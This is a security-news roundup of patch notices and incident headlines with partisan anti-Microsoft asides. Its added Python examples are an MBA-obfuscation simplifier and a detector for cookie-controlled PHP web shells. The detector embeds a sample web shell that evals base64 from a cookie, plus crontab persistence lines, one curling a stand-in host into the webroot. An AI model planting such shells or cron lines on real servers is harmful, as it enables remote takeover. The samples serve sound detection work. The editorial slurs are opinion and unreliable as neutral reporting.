Security Leftovers and Some FUD
-
LWN ☛ Security updates for Friday
Security updates have been issued by AlmaLinux (freerdp, grafana, kernel, rsync, and thunderbird), Debian (chromium, inetutils, and libpng1.6), Fedora (bind9-next, nginx-mod-modsecurity, and openbao), Mageia (firefox, nss and thunderbird), Red Hat (container-tools:rhel8), SUSE (conftest, dnsdist, ignition, libsoup, libsoup2, LibVNCServer, libXvnc-devel, opensc, ovmf-202602, perl-Crypt-URandom, python-tornado, python311-ecdsa, python311-Pygments, python315, tar, and wireshark), and Ubuntu (cairo, jpeg-xl, linux, linux-aws, linux-aws-6.17, linux-gcp, linux-gcp-6.17, linux-hwe-6.17, linux-realtime, linux, linux-aws, linux-aws-hwe, linux-kvm, linux-oracle, linux, linux-aws, linux-gcp, linux-gke, linux-gkeop, linux-ibm, linux-lowlatency, linux-nvidia, linux-raspi, linux-fips, linux-fips, linux-aws-fips, linux-fips, linux-aws-fips, linux-gcp-fips, and linux-realtime, linux-realtime-6.8, linux-raspi-realtime).
-
Security Week ☛ In Other News: Abusive Monopolist Microsoft Chaffbot Data Leak, Android Rootkit, Water Facility Hit by Ransomware
Other noteworthy stories that might have slipped under the radar: Symantec vulnerability, anti-ClickFix mechanism added to macOS, FBI hack classified as major incident.
-
OpenSSF (Linux Foundation) ☛ Rethinking Post-Deployment Vulnerability Detection
-
Security Week ☛ North Korean Hackers Drain $285 Million From Drift in 10 Seconds
The attackers prepared infrastructure and multiple nonce-based transactions, took over an admin key, and drained five vaults.
-
Security Week ☛ T-Mobile Sets the Record Straight on Latest Data Breach Filing
The cybersecurity incident involved an insider and had a limited impact, the telecoms giant told SecurityWeek.
-
Security Week ☛ React2Shell Exploited in Large-Scale Credential Harvesting Campaign
Using automated scanning and the Nexus Listener collection framework, the hackers compromised over 750 systems.
-
Security Week ☛ Mobile Attack Surface Expands as Enterprises Lose Control
Shadow Hey Hi (AI) embedded in everyday apps, combined with outdated mobile devices and zero-click exploits, is creating a new and largely unseen mobile risk.
-
Security Week ☛ TrueConf Zero-Day Exploited in Asian Government Attacks
A Chinese threat actor exploited the video conferencing platform to perform reconnaissance, escalate privileges, and execute additional payloads.
-
Security Week ☛ Critical ShareFile Flaws Lead to Unauthenticated RCE
The vulnerabilities can be chained together to bypass authentication and upload arbitrary files to the server.
-
SANS ☛ TeamPCP Supply Chain Campaign: Update 006 - CERT-EU Confirms European Commission Cloud Breach, Sportradar Details Emerge, and Mandiant Quantifies Campaign at 1,000+ SaaS Environments, (Fri, Apr 3rd)
-
Trail of Bits ☛ Simplifying MBA obfuscation with CoBRA
Mixed Boolean-Arithmetic (MBA) obfuscation disguises simple operations like x + y behind tangles of arithmetic and bitwise operators. Malware authors and software protectors rely on it because no standard simplification technique covers both domains simultaneously: algebraic simplifiers don't understand bitwise logic, and Boolean minimizers can't handle arithmetic.
-
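How such a tangle can be undone for the linear subclass of MBA, as an added example (this is not code from the Trail of Bits post or from CoBRA, and it is not CoBRA's method): when the expression is a sum of constants times bitwise functions of x and y, every bit position contributes the same per-bit value scaled by 2^k, so evaluating the expression at the four word-level corners where every bit of x and every bit of y is equal recovers its coefficients over the basis {1, x, y, x & y}. Because that assumption fails for non-linear MBA, the candidate is always re-checked against the original on sample inputs and rejected on mismatch. The obfuscated forms of x + y and x ^ y and the non-linear sample are constructed for this example.

```python
"""Linear MBA simplification by evaluation at word-level corners (added example).

Not code from the Trail of Bits post or from CoBRA. For a linear MBA
f(x, y) = sum_i a_i * e_i(x, y), where each e_i is a bitwise function,
every bit position contributes 2^k * g(x_k, y_k) with g the per-bit
value of f, so evaluating f at X, Y in {0, ~0} (all bits equal) gives
g(a, b) * (2^w - 1) == -g(a, b) mod 2^w. Four evaluations therefore
recover the coefficients of f over the basis {1, x, y, x & y}.
"""
import random

WIDTH = 64
MASK = (1 << WIDTH) - 1


def mba_add(x, y):
    """Constructed obfuscated form of x + y (mod 2^64)."""
    return ((x ^ y) + 2 * (x & y)) & MASK


def mba_xor(x, y):
    """Constructed obfuscated form of x ^ y (mod 2^64)."""
    return ((x | y) - (x & y)) & MASK


def nonlinear_mba(x, y):
    """Constructed non-linear MBA: the linear method must reject it, not mis-simplify it."""
    return ((x & y) * (x | y)) & MASK


def simplify_linear(f):
    """Return (const, a, b, c) with f(x, y) == const + a*x + b*y + c*(x & y) (mod 2^WIDTH).
    Valid only when f is a linear MBA; always confirm with verify()."""
    g = {}
    for bit_x in (0, 1):
        for bit_y in (0, 1):
            word_x = MASK if bit_x else 0
            word_y = MASK if bit_y else 0
            # f(X, Y) == g * (2^WIDTH - 1) == -g mod 2^WIDTH, so negate to recover g
            g[(bit_x, bit_y)] = (-f(word_x, word_y)) & MASK
    # g(a, b) = g00 + (g10 - g00)*a + (g01 - g00)*b + (g11 - g10 - g01 + g00)*a*b;
    # summed over all bit positions the per-bit constant g00 becomes g00 * (2^WIDTH - 1) == -g00
    const = (-g[(0, 0)]) & MASK
    a = (g[(1, 0)] - g[(0, 0)]) & MASK
    b = (g[(0, 1)] - g[(0, 0)]) & MASK
    c = (g[(1, 1)] - g[(1, 0)] - g[(0, 1)] + g[(0, 0)]) & MASK
    return const, a, b, c


def rebuild(coeffs):
    """Turn recovered coefficients back into a callable for checking."""
    const, a, b, c = coeffs
    return lambda x, y: (const + a * x + b * y + c * (x & y)) & MASK


def verify(f, coeffs, samples=256, seed=1):
    """Compare f with the candidate on fixed and pseudo-random inputs.
    A mismatch means f was not a linear MBA and the candidate must be discarded."""
    rng = random.Random(seed)
    cand = rebuild(coeffs)
    points = [(3, 1), (0x1234, 0xABCD), (MASK, 1), (1 << 63, 1 << 63)]
    points += [(rng.getrandbits(WIDTH), rng.getrandbits(WIDTH)) for _ in range(samples)]
    return all(f(x, y) == cand(x, y) for x, y in points)


def _signed(c):
    """Show a coefficient mod 2^WIDTH as a small signed integer."""
    return c - (1 << WIDTH) if c >= (1 << (WIDTH - 1)) else c


def describe(coeffs):
    """Render coefficients as a readable expression such as 'x + y - 2*(x & y)'."""
    parts = []
    for coef, name in zip(coeffs, ("", "x", "y", "(x & y)")):
        s = _signed(coef)
        if s == 0:
            continue
        if name == "":
            term = str(abs(s))
        elif abs(s) == 1:
            term = name
        else:
            term = f"{abs(s)}*{name}"
        parts.append(("-" if s < 0 else "+", term))
    if not parts:
        return "0"
    sign, term = parts[0]
    out = ("-" if sign == "-" else "") + term
    for sign, term in parts[1:]:
        out += f" {sign} {term}"
    return out


if __name__ == "__main__":
    for name, f in (("mba_add", mba_add), ("mba_xor", mba_xor), ("nonlinear_mba", nonlinear_mba)):
        coeffs = simplify_linear(f)
        status = "verified" if verify(f, coeffs) else "REJECTED (not linear)"
        print(f"{name}: {describe(coeffs)}  [{status}]")
```

The two constructed identities come back as x + y and x + y - 2*(x & y) (the linear form of xor over this basis), while the product (x & y) * (x | y) yields a candidate that fails verification, which is the failure mode a practitioner must handle before trusting any evaluation-based simplifier on real binaries.
-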
Microsoft ☛ Cookie-controlled PHP webshells: A stealthy tradecraft in Linux hosting environments [Ed: When Microsoft covers "Linux"...]
-
Hacker News ☛ Microsoft Details Cookie-Controlled PHP Web Shells Persisting via Cron on Linux Servers [Ed: Microsoft looking for ways to demonise Linux instead of plugging Windows back doors]
Threat actors are increasingly using HTTP cookies as a control channel for PHP-based web shells on Linux servers and to achieve remote code execution, according to findings from the Microsoft Defender Security Research Team.
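A check a Linux hosting admin could run against the pattern described above, as an added example (not Microsoft's detection logic and not taken from the report): it flags PHP source in which a $_COOKIE value, or a variable derived from one, reaches an execution sink, and it flags crontab entries that would re-run or re-drop PHP. The web shell snippet, the benign cookie-reading snippet, and the crontab lines are all constructed for the example, as are the regular expressions, which are heuristics rather than a parser.

```python
"""Heuristic hunt for cookie-controlled PHP web shells and cron persistence.

Added example, not Microsoft's detection logic or anything from the report.
find_cookie_sinks() flags PHP source where a $_COOKIE value (or a variable
derived from one) reaches an execution sink, which is the control-channel
pattern described; suspicious_cron_lines() flags crontab entries that would
re-run or re-drop PHP. All samples below are constructed.
"""
import re

# Constructed: a minimal cookie-controlled shell. The payload arrives in a cookie,
# so it never appears as a query string or POST body in typical access logs.
SHELL_SAMPLE = r'''<?php
$k = "sess";
if (isset($_COOKIE[$k])) { @eval(base64_decode($_COOKIE[$k])); }
'''

# Constructed: a benign cookie read (language preference) that must not fire.
BENIGN_SAMPLE = r'''<?php
$lang = isset($_COOKIE["lang"]) ? $_COOKIE["lang"] : "en";
setcookie("lang", $lang, time() + 3600);
echo htmlspecialchars($lang);
'''

# Constructed crontab: one legitimate job and two persistence-style entries.
CRON_SAMPLE = """\
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /usr/bin/php -r 'eval(base64_decode("..."));' >/dev/null 2>&1
* * * * * curl -s http://example.invalid/x.txt -o /var/www/html/.cache.php
"""

SINK_CALL = re.compile(
    r"\b(eval|assert|system|exec|shell_exec|passthru|popen|proc_open|create_function)\s*\(([^;]*)\)",
    re.IGNORECASE,
)
ASSIGN = re.compile(r"(\$\w+)\s*=\s*([^;]+);")


def cookie_tainted_vars(src):
    """Variables assigned (directly or transitively) from $_COOKIE, in source order."""
    tainted = {"$_COOKIE"}
    for m in ASSIGN.finditer(src):
        var, rhs = m.group(1), m.group(2)
        if any(t in rhs for t in tainted):
            tainted.add(var)
    return tainted


def find_cookie_sinks(src):
    """Return descriptions of places where cookie-derived data reaches an execution sink."""
    tainted = cookie_tainted_vars(src)
    hits = []
    for m in SINK_CALL.finditer(src):
        if any(t in m.group(2) for t in tainted):
            hits.append(f"{m.group(1)}() called with cookie-derived argument: {m.group(0)}")
    # variable function calls such as $f(...) where $f itself came from a cookie
    for var in tainted - {"$_COOKIE"}:
        if re.search(re.escape(var) + r"\s*\(", src):
            hits.append(f"cookie-derived variable used as function name: {var}(...)")
    return hits


CRON_FLAGS = (
    (re.compile(r"\bphp\b.*\b(eval|base64_decode)\b"), "php inline eval"),
    (re.compile(r"\b(curl|wget)\b.*(\|\s*(sh|bash)\b|-[oO]\s+\S*/www/)"), "download to webroot or pipe to shell"),
    (re.compile(r"/www/\S*\.php\b"), "touches a PHP file under the webroot"),
)


def suspicious_cron_lines(crontab):
    """Return (reason, line) for crontab entries matching persistence patterns."""
    out = []
    for line in crontab.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for pattern, reason in CRON_FLAGS:
            if pattern.search(line):
                out.append((reason, line))
                break
    return out


if __name__ == "__main__":
    for label, src in (("shell", SHELL_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, find_cookie_sinks(src))
    for reason, line in suspicious_cron_lines(CRON_SAMPLE):
        print(f"cron: {reason}: {line}")
```

On a real host you would feed find_cookie_sinks() every .php file under the web roots (including dot-files and upload directories) and suspicious_cron_lines() the system crontab, /etc/cron.d, and each user's crontab -l output; the benign sample shows why cookie reads alone are not enough and the sink must be part of the match.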
-
Chaos malware now targeting 64-bit Linux servers
In an April 2 blog post, the Darktrace researchers said this was the first documented example of Chaos targeting 64-bit Linux servers. Until now, Chaos had only been seen targeting routers and edge devices.